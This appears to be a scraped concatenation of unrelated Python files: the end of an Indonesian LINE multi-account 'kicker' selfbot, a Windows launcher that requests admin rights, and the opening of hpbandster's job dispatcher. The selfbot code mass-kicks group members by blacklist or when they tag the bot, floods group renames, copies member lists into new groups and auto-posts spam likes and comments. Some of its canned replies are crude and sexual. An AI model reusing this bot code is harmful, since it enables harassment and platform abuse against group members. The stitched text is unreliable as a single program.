ki.sendText(msg.to,"Ya gitu deh intinya mah questioning")
#-------------Fungsi Balesan Respon Finish---------------------#
elif ("Vkick" in msg.text):
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
cl.kickoutFromGroup(msg.to,[target])
except:
cl.sendText(msg.to,"Error")
#-------------Fungsi Speedbot Start---------------------#
elif msg.text in ["Speed","Sp"]:
if msg.from_ in admin:
start = time.time()
cl.sendText(msg.to, "Sabar Boss...")
elapsed_time = time.time() - start
ki.sendText(msg.to, "%sDetik" % (elapsed_time))
kk.sendText(msg.to, "%sDetik" % (elapsed_time))
cl.sendText(msg.to, "%sDetik" % (elapsed_time))
#-------------Fungsi Speedbot Finish---------------------#
#-------------Fungsi Banned Send Contact Start------------------#
elif msg.text in ["Ban"]:
if msg.from_ in admin:
wait["wblacklist"] = True
cl.sendText(msg.to,"Kirim contact")
kk.sendText(msg.to,"Kirim contact")
kc.sendText(msg.to,"Kirim contact")
elif msg.text in ["Unban"]:
if msg.from_ in admin:
wait["dblacklist"] = True
cl.sendText(msg.to,"Kirim contact")
kk.sendText(msg.to,"Kirim contact")
kc.sendText(msg.to,"Kirim contact")
#-------------Fungsi Banned Send Contact Finish------------------#
elif msg.text in ["Creator"]:
msg.contentType = 13
msg.contentMetadata = {'mid': 'u6fb1bd6b5af0f27bbdb88ecb6a1468c0'}
cl.sendText(msg.to,"======================")
cl.sendMessage(msg)
cl.sendText(msg.to,"======================")
cl.sendText(msg.to,"Itu Creator Kami Yang Manis Kalem 😜\nSmule : @FS3i_Kris_S1H\nNama : Kris\nZodiak : Cancer")
#-------------Fungsi Chat ----------------
elif msg.text in ["Woy","woy","Woi","woi"]:
quote = ['Istri yang baik itu Istri yang Mengizinkan Suaminya untuk Poligami 😂😂😂.','Kunci Untuk Bikin Suami Bahagia itu cuma satu..\nIzinkan Suamimu Untuk Selingkuh Coyyy ','Ah Koplak Lu','Muka Lu Kaya Jembut','Ada Orang kah disini?','Ada Janda Yang Bisa Di Ajak Mojok Gak, Euy','Ada Perawan Nganggur ga Coy?']
psn = random.choice(quote)
cl.sendText(msg.to,psn)
#-------------Fungsi Bannlist Start------------------#
elif msg.text in ["Banlist"]:
if msg.from_ in admin:
if wait["blacklist"] == {}:
random.choice(KAC).sendText(msg.to,"Tidak Ada Akun Terbanned")
else:
random.choice(KAC).sendText(msg.to,"Blacklist user")
mc = ""
for mi_d in wait["blacklist"]:
mc += "->" +cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
#-------------Fungsi Bannlist Finish------------------#
elif msg.text in ["Cek ban"]:
if msg.from_ in admin:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
cocoa = ""
for mm in matched_list:
cocoa += mm + "\n"
random.choice(KAC).sendText(msg.to,cocoa + "")
elif msg.text in ["Kill ban"]:
if msg.from_ in admin:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
if matched_list == []:
random.choice(KAC).sendText(msg.to,"There was no blacklist user")
random.choice(KAC).sendText(msg.to,"There was no blacklist user")
random.choice(KAC).sendText(msg.to,"There was no blacklist user")
return
for jj in matched_list:
random.choice(KAC).kickoutFromGroup(msg.to,[jj])
random.choice(KAC).kickoutFromGroup(msg.to,[jj])
random.choice(KAC).kickoutFromGroup(msg.to,[jj])
random.choice(KAC).kickoutFromGroup(msg.to,[jj])
random.choice(KAC).sendText(msg.to,"Blacklist emang pantas tuk di usir")
random.choice(KAC).sendText(msg.to,"Blacklist emang pantas tuk di usir")
random.choice(KAC).sendText(msg.to,"Blacklist emang pantas tuk di usir")
elif msg.text in ["Clear"]:
if msg.from_ in admin:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.invitee]
for _mid in gMembMids:
cl.cancelGroupInvitation(msg.to,[_mid])
cl.sendText(msg.to,"I pretended to cancel and canceled.")
elif "random: " in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
strnum = msg.text.replace("random: ","")
source_str = 'abcdefghijklmnopqrstuvwxyz1234567890@:;./_][!&%$#)(=~^|'
try:
num = int(strnum)
group = cl.getGroup(msg.to)
for var in range(0,num):
name = "".join([random.choice(source_str) for x in xrange(10)])
time.sleep(0.01)
group.name = name
cl.updateGroup(group)
except:
cl.sendText(msg.to,"Error")
elif "albumat'" in msg.text:
try:
albumtags = msg.text.replace("albumat'","")
gid = albumtags[:6]
name = albumtags.replace(albumtags[:34],"")
cl.createAlbum(gid,name)
cl.sendText(msg.to,name + "created an album")
except:
cl.sendText(msg.to,"Error")
elif "fakecat'" in msg.text:
try:
source_str = 'abcdefghijklmnopqrstuvwxyz1234567890@:;./_][!&%$#)(=~^|'
name = "".join([random.choice(source_str) for x in xrange(10)])
anu = msg.text.replace("fakecat'","")
random.choice(KAC).sendText(msg.to,str(cl.channel.createAlbum(msg.to,name,anu)))
except Exception as e:
try:
cl.sendText(msg.to,str(e))
except:
pass
elif "kedapkedip " in msg.text.lower():
if msg.from_ in admin:
txt = msg.text.replace("kedapkedip ", "")
cl.kedapkedip(msg.to,txt)
print "[Command] Kedapkedip"
#--------------------------------------------------------
elif "Recover" in msg.text:
thisgroup = cl.getGroups([msg.to])
Mids = [contact.mid for contact in thisgroup[0].members]
mi_d = Mids[:33]
cl.createGroup("Recover", mi_d)
cl.sendText(msg.to,"Success recover")
#--------------------------------------------------------
#--------------------------------------------------------
elif msg.text in ["Remove all chat"]:
if msg.from_ in owner:
cl.removeAllMessages(op.param2)
ki.removeAllMessages(op.param2)
kk.removeAllMessages(op.param2)
kc.removeAllMessages(op.param2)
ks.removeAllMessages(op.param2)
k1.removeAllMessages(op.param2)
k2.removeAllMessages(op.param2)
k3.removeAllMessages(op.param2)
k4.removeAllMessages(op.param2)
k5.removeAllMessages(op.param2)
cl.sendText(msg.to,"Removed all chat Finish")
#---------------------------
#KICK_BY_TAG
elif "Boom " in msg.text:
if msg.from_ in owner:
if 'MENTION' in msg.contentMetadata.keys()!= None:
names = re.findall(r'@(\w+)', msg.text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
print mentionees
for mention in mentionees:
random.choice(KAC).kickoutFromGroup(msg.to,[mention['M']])
#===========================================
elif "Searchid: " in msg.text:
if msg.from_ in admin:
msgg = msg.text.replace('Searchid: ','')
conn = cl.findContactsByUserid(msgg)
if True:
msg.contentType = 13
msg.contentMetadata = {'mid': conn.mid}
cl.sendText(msg.to,"http://line.me/ti/p/~" + msgg)
kk.sendMessage(msg)
#===========================================
elif "megs " in msg.text:
if msg.from_ in owner:
gName = msg.text.replace("megs ","")
ap = random.choice(KAC).getGroups([msg.to])
semua = [contact.mid for contact in ap[0].members]
nya = ap[0].members
for a in nya:
Mi_d = str(a.mid)
random.choice(KAC).createGroup(gName, semua)
#cl.leaveRoom(op.param1)
#cl.leaveGroup([msg.to])
#===========================================
if op.param3 == "1":
if op.param1 in protectname:
group = cl.getGroup(op.param1)
try:
group.name = wait["pro_name"][op.param1]
cl.updateGroup(group)
cl.sendText(op.param1, "Groupname protect now")
wait["blacklist"][op.param2] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
except Exception as e:
print e
pass
# if op.param1 in autocancel:
# OWN = "ua7fc5964d31f45ac75128fc2b8deb842","u406133ad4d3fbe50a2f4d51ea081d050","ua51ba06b0dd18c0bfe2cc6caa3458202","uc7f32bb28dc009916d40af87c9910ddc"
# if op.param2 in OWN:
# pass
# else:
# Inviter = op.param3.replace("",',')
# InviterX = Inviter.split(",")
# contact = cl.getContact(op.param2)
# cl.cancelGroupInvitation(op.param1,InviterX)
# ki.cancelGroupInvitation(op.param1,InviterX)
# kk.cancelGroupInvitation(op.param1,InviterX)
# ks.cancelGroupInvitation(op.param1,InviterX)
# kc.cancelGroupInvitation(op.param1,InviterX)
# ka.cancelGroupInvitation(op.param1,InviterX)
# cl.kickoutFromGroup(op.param1,[op.param2])
# ki.kickoutFromGroup(op.param1,[op.param2])
# kk.kickoutFromGroup(op.param1,[op.param2])
# ks.kickoutFromGroup(op.param1,[op.param2])
# kc.kickoutFromGroup(op.param1,[op.param2])
# ka.kickoutFromGroup(op.param1,[op.param2])
# wait["blacklist"][op.param2] = True
# f=codecs.open('st2__b.json','w','utf-8')
# json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
#------------------------------------------------------------------------------------
if op.type == 32:
OWN = ""
if op.param2 in Bots and admin:
pass
else:
Inviter = op.param3.replace("",',')
InviterX = Inviter.split(",")
contact = cl.getContact(op.param2)
ki.kickoutFromGroup(op.param1,[op.param2])
kk.kickoutFromGroup(op.param1,[op.param2])
kc.kickoutFromGroup(op.param1,[op.param2])
ks.kickoutFromGroup(op.param1,[op.param2])
k1.kickoutFromGroup(op.param1,[op.param2])
k2.kickoutFromGroup(op.param1,[op.param2])
k3.kickoutFromGroup(op.param1,[op.param2])
k4.kickoutFromGroup(op.param1,[op.param2])
k5.kickoutFromGroup(op.param1,[op.param2])
wait["blacklist"][op.param2] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
#===========================================
# if op.type == 26:
# if "@"+cl.getProfile().displayName in msg.text:
# tanya = msg.text.replace("@"+cl.getProfile().displayName,"")
# jawab = ("Jgn Tag Gw woyy!!\nlagi ngocok dulu...!!!","Berisik jgn tag Gw Koplak","Gw Sibuk, Gausah di Tag!!!","Ngapain tag neh,, kangen yah...!!!")
# jawaban = random.choice(jawab)
# cl.sendText(msg.to,jawaban)
elif "@"+cl.getProfile().displayName in msg.text:
try:
tanya = msg.text.replace("@"+cl.getProfile().displayName,"")
jawab = ("Jgn Tag Si "+cl.getProfile().displayName+"Ta cipok luh..!!","Berisik jgn tag si "+cl.getProfile().displayName+" dia lagi asyik ngocok...!!!")
jawaban = random.choice(jawab)
random.choice(KAC).sendText(msg.to,jawaban)
random.choice(KAC).kickoutFromGroup(msg.to,[msg.from_])
except:
pass
#---------CCTV-----------
if op.type == 55:
try:
if op.param1 in wait2['readPoint']:
Name = cl.getContact(op.param2).displayName
if Name in wait2['readMember'][op.param1]:
pass
else:
wait2['readMember'][op.param1] += "\n[•]" + Name
wait2['ROM'][op.param1][op.param2] = "[•]" + Name
else:
cl.sendText
except:
pass
#---------------------
# if op.type == 17:
# if op.param2 in Bots:
# return
# ginfo = cl.getGroup(op.param1)
# random.choice(KAC).sendText(op.param1, "Welcome\nSelamat Datang Di " + str(ginfo.name))
# random.choice(KAC).sendText(op.param1, "Founder =>>> " + str(ginfo.name) + " :\n" + ginfo.creator.displayName)
# random.choice(KAC).sendText(op.param1, "😊 Semoga Betah Kk 😘\nNo Baper,No nakal,No Ngeyel ya,No Bulshit")
# print "MEMBER HAS JOIN THE GROUP"
# if op.type == 15:
# if op.param2 in Bots:
# return
# random.choice(KAC).sendText(op.param1, "Baper Tuh Orang :v\nBelum di Anu Kayanya 😊")
# print "MEMBER HAS LEFT THE GROUP"
#--------------------------------------------------------
# if 'MENTION' in mid or Amid or Bmid or Cmid or Dmid or Emid or Fmid or Gmid or Hmid or Imid:
# cl.sendtext(msg.to,'[Auto Respon]\nngapain tag, pc langsung aja...!!!')
# pass
#--------------------------------------------------------
#Restart_Program
elif msg.text in ["Bot restart"]:
if msg.from_ in Creator:
cl.sendText(msg.to, "Bot has been restarted")
restart_program()
print "@Restart"
else:
cl.sendText(msg.to, "No Access")
#--------------------------------------------------------
if op.type == 59:
print op
except Exception as error:
print error
def a2():
now2 = datetime.now()
nowT = datetime.strftime(now2,"%M")
if nowT[14:] in ["10","20","30","40","50","00"]:
return False
else:
return True
def autolike():
for zx in range(0,500):
hasil = cl.activity(limit=500)
if hasil['result']['posts'][zx]['postInfo']['liked'] == False:
try:
cl.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1001)
cl.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"👉ąµţ๏ℓɨЌ€ By✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰😊\n\n☆º°˚˚☆ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰°˚˚☆(^ω^)\nąµţ๏ℓɨЌ€ by Kris ⭐👈 »»» http://line.me/ti/p/GkwfNjoPDH «««")
ki.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1001)
ki.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"Aku Juga Ikutin Boss Aku Like Status Kamu Ka\n\n Like Back yah Ka 😊")
kk.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1001)
kk.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"Aku Juga Ikutin Boss Aku Like Status Kamu Ka\n\n Like Back yah Ka 😊")
kc.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1001)
kc.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"Aku Juga Ikutin Boss Aku Like Status Kamu Ka\n\n Like Back yah Ka 😊")
ks.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1001)
ks.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"Aku Juga Ikutin Boss Aku Like Status Kamu Ka\n\n Like Back yah Ka 😊")
k1.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1001)
k1.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"Aku Juga Ikutin Boss Aku Like Status Kamu Ka\n\n Like Back yah Ka 😊")
k2.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1001)
k2.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"Aku Juga Ikutin Boss Aku Like Status Kamu Ka\n\n Like Back yah Ka 😊")
k3.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1001)
k3.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"Aku Juga Ikutin Boss Aku Like Status Kamu Ka\n\n Like Back yah Ka 😊")
cl.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"👉ąµţ๏ℓɨЌ€ By✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰😊\n\n☆º°˚˚☆ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰°˚˚☆(^ω^)\nąµţ๏ℓɨЌ€ by Kris ⭐👈 »»» http://line.me/ti/p/GkwfNjoPDH «««")
print "Like"
except:
pass
else:
print "Already Liked"
time.sleep(0.01)
#thread3 = threading.Thread(target=autolike)
#thread3.daemon = True
#thread3.start()
#--------------------
def likePost():
for zx in range(0,500):
hasil = cl.activity(limit=500)
if hasil['result']['posts'][zx]['postInfo']['liked'] == False:
if hasil['result']['posts'][zx]['userInfo']['mid'] in owner:
try:
cl.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
ki.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
kk.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
kc.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
ks.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
k1.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
k2.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
k3.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
k4.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
k5.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
cl.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"👉ąµţ๏ℓɨЌ€ By✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰😊\n\n☆º°˚˚☆ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰°˚˚☆(^ω^)\nąµţ๏ℓɨЌ€ by Kris ⭐👈 »»» http://line.me/ti/p/GkwfNjoPDH «««")
ki.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"👉ąµţ๏ℓɨЌ€ By✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰😊\n\n☆º°˚˚☆ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰°˚˚☆(^ω^)\nąµţ๏ℓɨЌ€ by Kris ⭐👈 »»» http://line.me/ti/p/GkwfNjoPDH «««")
kk.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"👉ąµţ๏ℓɨЌ€ By✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰😊\n\n☆º°˚˚☆ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰°˚˚☆(^ω^)\nąµţ๏ℓɨЌ€ by Kris ⭐👈 »»» http://line.me/ti/p/GkwfNjoPDH «««")
kc.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"👉ąµţ๏ℓɨЌ€ By✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰😊\n\n☆º°˚˚☆ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰°˚˚☆(^ω^)\nąµţ๏ℓɨЌ€ by Kris ⭐👈 »»» http://line.me/ti/p/GkwfNjoPDH «««")
ks.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"👉ąµţ๏ℓɨЌ€ By✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰😊\n\n☆º°˚˚☆ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰°˚˚☆(^ω^)\nąµţ๏ℓɨЌ€ by Kris ⭐👈 »»» http://line.me/ti/p/GkwfNjoPDH «««")
k1.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"👉ąµţ๏ℓɨЌ€ By✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰😊\n\n☆º°˚˚☆ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰°˚˚☆(^ω^)\nąµţ๏ℓɨЌ€ by Kris ⭐👈 »»» http://line.me/ti/p/GkwfNjoPDH «««")
k2.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"👉ąµţ๏ℓɨЌ€ By✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰😊\n\n☆º°˚˚☆ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰°˚˚☆(^ω^)\nąµţ๏ℓɨЌ€ by Kris ⭐👈 »»» http://line.me/ti/p/GkwfNjoPDH «««")
k3.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"👉ąµţ๏ℓɨЌ€ By✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰😊\n\n☆º°˚˚☆ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰°˚˚☆(^ω^)\nąµţ๏ℓɨЌ€ by Kris ⭐👈 »»» http://line.me/ti/p/GkwfNjoPDH «««")
print "Like"
except:
pass
else:
print "Status Sudah di Like Boss"
def a2():
now2 = datetime.now()
nowT = datetime.strftime(now2,"%M")
if nowT[14:] in ["10","20","30","40","50","00"]:
return False
else:
return True
def nameUpdate():
while True:
try:
#while a2():
#pass
if wait["clock"] == True:
now2 = datetime.now()
nowT = datetime.strftime(now2,"(%H:%M)")
profile = cl.getProfile()
profile.displayName = wait["cName"]
cl.updateProfile(profile)
profile2 = ki.getProfile()
profile2.displayName = wait["cName2"]
ki.updateProfile(profile2)
profile3 = kk.getProfile()
profile3.displayName = wait["cName3"]
kk.updateProfile(profile3)
profile4 = kc.getProfile()
profile4.displayName = wait["cName4"]
kc.updateProfile(profile4)
profile5 = ks.getProfile()
profile5.displayName = wait["cName5"]
ks.updateProfile(profile5)
time.sleep(600)
except:
pass
thread2 = threading.Thread(target=nameUpdate)
thread2.daemon = True
thread2.start()
while True:
try:
Ops = cl.fetchOps(cl.Poll.rev, 5)
except EOFError:
raise Exception("It might be wrong revision\n" + str(cl.Poll.rev))
for Op in Ops:
if (Op.type != OpType.END_OF_OPERATION):
cl.Poll.rev = max(cl.Poll.rev, Op.revision)
bot(Op)
|
main.py
|
import os
abspath = os.path.abspath(__file__)
dname = os.path.dirname(abspath)
print("Working directory:", dname)
os.chdir(dname)
from Server.server import Server
import subprocess
import sys
import threading
import ctypes
def run_as_admin(argv=None, debug=False):
shell32 = ctypes.windll.shell32
if argv is None and shell32.IsUserAnAdmin():
return True
if argv is None:
argv = sys.argv
if hasattr(sys, '_MEIPASS'):
# Support pyinstaller wrapped program.
arguments =argv[1:]
else:
arguments = argv
argument_line = u' '.join(arguments)
executable = sys.executable
ret = shell32.ShellExecuteW(None, u"runas", executable, argument_line, None, 1)
if int(ret) <= 32:
return False
return None
def runAnalyzer():
proc = subprocess.Popen([sys.executable, "Static/analyzer.py"], shell=False)
proc.communicate()
#shell32 = ctypes.windll.shell32
#ret = shell32.ShellExecuteW(None, u"runas", sys.executable, "Static/analyzer.py", None, 1)
if __name__ == "__main__":
if os.name == 'nt':
# Should not be run at Linux
run_as_admin()
threading.Thread(target=runAnalyzer).start()
server = Server(ip='127.0.0.1', port=8888)
server.run()
|
dispatcher.py
|
import threading
import logging
import queue
import time
import Pyro4
class Job(object):
def __init__(self, id, **kwargs):
self.id = id
self.kwargs = kwargs
self.timestamps = {}
self.result = None
self.exception = None
self.worker_name = None
def time_it(self, which_time):
self.timestamps[which_time] = time.time()
def __repr__(self):
return(
"job_id: " + str(self.id) + "\n" +
"kwargs: " + str(self.kwargs) + "\n" +
"result: " + str(self.result) + "\n" +
"exception: " + str(self.exception) + "\n"
)
def recreate_from_run(self, run):
run.config_id
run.budget
run.error_logs
run.loss
run.info
run.time_stamps
class Worker(object):
def __init__(self, name, uri):
self.name = name
self.proxy = Pyro4.Proxy(uri)
self.runs_job = None
def is_alive(self):
try:
self.proxy._pyroReconnect(1)
except Pyro4.errors.ConnectionClosedError:
return False
except:
raise
return(True)
def shutdown(self):
self.proxy.shutdown()
def is_busy(self):
return(self.proxy.is_busy())
def __repr__(self):
return(self.name)
class Dispatcher(object):
"""
The dispatcher is responsible for assigning tasks to free workers, report results back to the master and
communicate to the nameserver.
"""
def __init__(self, new_result_callback, run_id='0',
ping_interval=10, nameserver='localhost',
nameserver_port=None,
host=None, logger=None, queue_callback=None):
"""
Parameters
----------
new_result_callback: function
function that will be called with a `Job instance <hpbandster.core.dispatcher.Job>`_ as argument.
From the `Job` the result can be read and e.g. logged.
run_id: str
unique run_id associated with the HPB run
ping_interval: int
how often to ping for workers (in seconds)
nameserver: str
address of the Pyro4 nameserver
nameserver_port: int
port of Pyro4 nameserver
host: str
ip (or name that resolves to that) of the network interface to use
logger: logging.Logger
logger-instance for info and debug
queue_callback: function
gets called with the number of workers in the pool on every update-cycle
"""
self.new_result_callback = new_result_callback
self.queue_callback = queue_callback
self.run_id = run_id
self.nameserver = nameserver
self.nameserver_port = nameserver_port
self.host = host
self.ping_interval = int(ping_interval)
self.shutdown_all_threads = False
if logger is None:
self.logger = logging.getLogger('hpbandster')
else:
self.logger = logger
self.worker_pool = {}
self.waiting_jobs = queue.Queue()
self.running_jobs = {}
self.idle_workers = set()
self.thread_lock = threading.Lock()
self.runner_cond = threading.Condition(self.thread_lock)
self.discover_cond = threading.Condition(self.thread_lock)
self.pyro_id = "hpbandster.run_%s.dispatcher" % self.run_id
def run(self):
with self.discover_cond:
t1 = threading.Thread(
target=self.discover_workers, name='discover_workers')
t1.start()
self.logger.info(
'DISPATCHER: started the \'discover_worker\' thread')
t2 = threading.Thread(target=self.job_runner, name='job_runner')
t2.start()
self.logger.info('DISPATCHER: started the \'job_runner\' thread')
self.pyro_daemon = Pyro4.core.Daemon(host=self.host)
with Pyro4.locateNS(host=self.nameserver, port=self.nameserver_port) as ns:
uri = self.pyro_daemon.register(self, self.pyro_id)
ns.register(self.pyro_id, uri)
self.logger.info("DISPATCHER: Pyro daemon running on %s" %
(self.pyro_daemon.locationStr))
self.pyro_daemon.requestLoop()
with self.discover_cond:
self.shutdown_all_threads = True
self.logger.info('DISPATCHER: Dispatcher shutting down')
self.runner_cond.notify_all()
self.discover_cond.notify_all()
with Pyro4.locateNS(self.nameserver, port=self.nameserver_port) as ns:
ns.remove(self.pyro_id)
t1.join()
self.logger.debug('DISPATCHER: \'discover_worker\' thread exited')
t2.join()
self.logger.debug('DISPATCHER: \'job_runner\' thread exited')
self.logger.info('DISPATCHER: shut down complete')
def shutdown_all_workers(self, rediscover=False):
with self.discover_cond:
for worker in self.worker_pool.values():
worker.shutdown()
if rediscover:
time.sleep(1)
self.discover_cond.notify()
def shutdown(self, shutdown_workers=False):
if shutdown_workers:
self.shutdown_all_workers()
with self.runner_cond:
self.pyro_daemon.shutdown()
@Pyro4.expose
@Pyro4.oneway
def trigger_discover_worker(self):
# time.sleep(1)
self.logger.info("DISPATCHER: A new worker triggered discover_worker")
with self.discover_cond:
self.discover_cond.notify()
def discover_workers(self):
self.discover_cond.acquire()
sleep_interval = 1
while True:
self.logger.debug('DISPATCHER: Starting worker discovery')
update = False
with Pyro4.locateNS(host=self.nameserver, port=self.nameserver_port) as ns:
worker_names = ns.list(
prefix="hpbandster.run_%s.worker." % self.run_id)
self.logger.debug("DISPATCHER: Found %i potential workers, %i currently in the pool." % (
len(worker_names), len(self.worker_pool)))
for wn, uri in worker_names.items():
if not wn in self.worker_pool:
w = Worker(wn, uri)
if not w.is_alive():
self.logger.debug(
'DISPATCHER: skipping dead worker, %s' % wn)
continue
update = True
self.logger.info(
'DISPATCHER: discovered new worker, %s' % wn)
self.worker_pool[wn] = w
# check the current list of workers
crashed_jobs = set()
all_workers = list(self.worker_pool.keys())
for wn in all_workers:
# remove dead entries from the nameserver
if not self.worker_pool[wn].is_alive():
self.logger.info(
'DISPATCHER: removing dead worker, %s' % wn)
update = True
# todo check if there were jobs running on that that need to be rescheduled
current_job = self.worker_pool[wn].runs_job
if not current_job is None:
self.logger.info(
'Job %s was not completed' % str(current_job))
crashed_jobs.add(current_job)
del self.worker_pool[wn]
self.idle_workers.discard(wn)
continue
if not self.worker_pool[wn].is_busy():
self.idle_workers.add(wn)
# try to submit more jobs if something changed
if update:
if not self.queue_callback is None:
self.discover_cond.release()
self.queue_callback(len(self.worker_pool))
self.discover_cond.acquire()
self.runner_cond.notify()
for crashed_job in crashed_jobs:
self.discover_cond.release()
self.register_result(
crashed_job, {'result': None, 'exception': 'Worker died unexpectedly.'})
self.discover_cond.acquire()
self.logger.debug('DISPATCHER: Finished worker discovery')
# if (len(self.worker_pool == 0 ): # ping for new workers if no workers are currently available
# self.logger.debug('No workers available! Keep pinging')
# self.discover_cond.wait(sleep_interval)
# sleep_interval *= 2
# else:
self.discover_cond.wait(self.ping_interval)
if self.shutdown_all_threads:
self.logger.debug('DISPATCHER: discover_workers shutting down')
self.runner_cond.notify()
self.discover_cond.release()
return
def number_of_workers(self):
with self.discover_cond:
return(len(self.worker_pool))
def job_runner(self):
self.runner_cond.acquire()
while True:
while self.waiting_jobs.empty() or len(self.idle_workers) == 0:
self.logger.debug('DISPATCHER: jobs to submit = %i, number of idle workers = %i -> waiting!' %
(self.waiting_jobs.qsize(), len(self.idle_workers)))
self.runner_cond.wait()
self.logger.debug('DISPATCHER: Trying to submit another job.')
if self.shutdown_all_threads:
self.logger.debug('DISPATCHER: job_runner shutting down')
self.discover_cond.notify()
self.runner_cond.release()
return
job = self.waiting_jobs.get()
wn = self.idle_workers.pop()
worker = self.worker_pool[wn]
self.logger.debug('DISPATCHER: starting job %s on %s' %
(str(job.id), worker.name))
job.time_it('started')
worker.runs_job = job.id
